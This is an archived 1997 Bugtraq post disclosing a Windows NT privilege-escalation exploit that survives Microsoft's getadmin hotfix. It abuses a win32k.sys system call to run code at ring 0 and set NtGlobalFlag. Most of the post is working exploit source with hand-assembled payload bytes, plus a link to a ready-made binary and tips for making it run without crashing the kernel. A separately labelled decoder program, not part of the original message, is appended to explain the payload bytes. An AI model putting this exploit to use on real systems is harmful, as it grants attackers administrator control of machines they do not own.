Bugtraq mailing list archives
It's not over yet.
From: aleph1 () DFW NET (Aleph One)
Date: Fri, 11 Jul 1997 03:45:18 -0500
From: Costin RAIU <craiu () gecad ro>
Subject: [NTSEC] It's not over yet.

Hi everyone,

We all know Microsoft released the getadmin hotfix. However, after a few hours of work, I was able to create a new exploit which also works with this patch Microsoft just released. The problem is now in eax=4346 which is handled somewhere in win32k.sys. There are more (I found 4) vulnerable functions, but not so interesting as this one. By calling the function in a special way, you can get your own code executed at ring 0 privilege. My program will simply change the byte of NtGlobalFlag to the DEBUG value, so you can run GetAdmin (which after the fix is not working anymore).

Since compiling the source is very difficult, the compiled binary is available at http://www.gecad.ro/~craiu/cr4.exe

This program was tested on 2 Windows NT patched machines, and worked ok. (I got the Admin rights)

Here's the source of my program:

```c
/* Run user code at ring 0
   Author: Costin RAIU <craiu () gecad ro> */

void* a[2];                 /* argument block whose address is passed in edx */

void main(void)
{
    int i;
    for (i=0;i<2;i++) a[i]=(void*)0;

    /* hand-assembled bytes written into the program's own image at 0x4080a4:
       or byte ptr [NtGlobalFlag+2],c1h  followed by  iretd */
    *(char*)(0x4080a4)=0x80;
    *(char*)(0x4080a5)=0x0d;
    *(char*)(0x4080a6)=0xb6;
    *(char*)(0x4080a7)=0xc2;
    *(char*)(0x4080a8)=0x14;
    *(char*)(0x4080a9)=0x80;
    *(char*)(0x4080aa)=0xc1;
    *(char*)(0x4080ab)=0xcf;

    _asm {
        mov eax,4346        ; service number handled in win32k.sys
        mov edx,offset a
        int 2eh             ; NT system call gate
    }
}
```

Due to the nature of this bug, it is very important that the address of the mov eax,4346 instruction be 004080a4. I am not an expert in the PE structure, but my cr4.exe program will always run at that address on my test machine. An assembler version might be very interesting, but there are other things to do now (like checking eax=187). If any of you guys has better assembler skills, I would like to see a nice asm version of my program.

OBJE: 4080a4 is somewhere in the program space, but it is not used (debug info/data space etc...). You can probably control the address of the retf (which btw is located at a0020b87h). After doing the "or" instruction, an IRETD is required to continue the execution of the function, otherwise the kernel will crash.

bye,
c0s

Costin RAIU, Data Security Expert
E-MAIL: BUSINESS mailto:craiu () gecad ro, PERSONAL craiu () usa net
PGP Key : http://www.gecad.ro/~craiu/craiu.asc (or search www.pgp.com)
KeyID: 2048/DD35A295 Costin RAIU <craiu () gecad ro>
Key fingerprint = FD 14 2A 90 64 41 58 9A 6B 34 47 D8 C5 E2 F4 5C
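For anyone analysing this post, the following added example (not part of Raiu's message or his cr4.exe) decodes the eight hand-assembled bytes the program writes at 0x4080a4 with a minimal two-opcode x86 decoder, so the OR target address and mask of the payload can be verified without a disassembler; the byte array is constructed from the source above, and the claim that the decoded address is NtGlobalFlag+2 is the author's, not checked here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* The eight bytes the post writes at 0x4080a4, copied from the source above. */
static const uint8_t payload[8] = {0x80,0x0d,0xb6,0xc2,0x14,0x80,0xc1,0xcf};
typedef struct {
    const char *mnemonic;   /* decoded instruction text */
    uint32_t    target;     /* absolute disp32 operand (0 for iretd) */
    uint8_t     imm8;       /* OR mask (0 for iretd) */
    size_t      length;     /* bytes consumed */
} insn_t;
/* Decode only the two x86 encodings the payload uses: 80 /1 ib with ModRM 0x0d
 * (mod=00, reg=001=OR, rm=101=disp32) -> "or byte ptr [disp32], imm8", and
 * CF -> "iretd". Returns 0 on success, -1 for any other byte sequence. */
static int decode_insn(const uint8_t *p, size_t n, insn_t *out)
{
    memset(out, 0, sizeof *out);
    if (n >= 1 && p[0] == 0xcf) {
        out->mnemonic = "iretd";
        out->length = 1;
        return 0;
    }
    if (n >= 7 && p[0] == 0x80 && p[1] == 0x0d) {
        out->mnemonic = "or byte ptr [disp32], imm8";
        out->target = (uint32_t)p[2] | (uint32_t)p[3] << 8 |      /* little-endian */
                      (uint32_t)p[4] << 16 | (uint32_t)p[5] << 24;
        out->imm8 = p[6];
        out->length = 7;
        return 0;
    }
    return -1;
}
/* Decode the whole buffer; returns the instruction count, or -1 on an unknown byte. */
static int decode_all(const uint8_t *buf, size_t n, insn_t *out, size_t max)
{
    size_t off = 0, count = 0;
    while (off < n && count < max) {
        if (decode_insn(buf + off, n - off, &out[count]) != 0) return -1;
        off += out[count++].length;
    }
    return (int)count;
}

int main(void)
{
    insn_t ins[4]; int n = decode_all(payload, sizeof payload, ins, 4);  /* 2 expected */
    for (int i = 0; i < n; i++)
        printf("%-28s target=0x%08x imm8=0x%02x\n", ins[i].mnemonic, ins[i].target, ins[i].imm8);
    return n < 0;
}
```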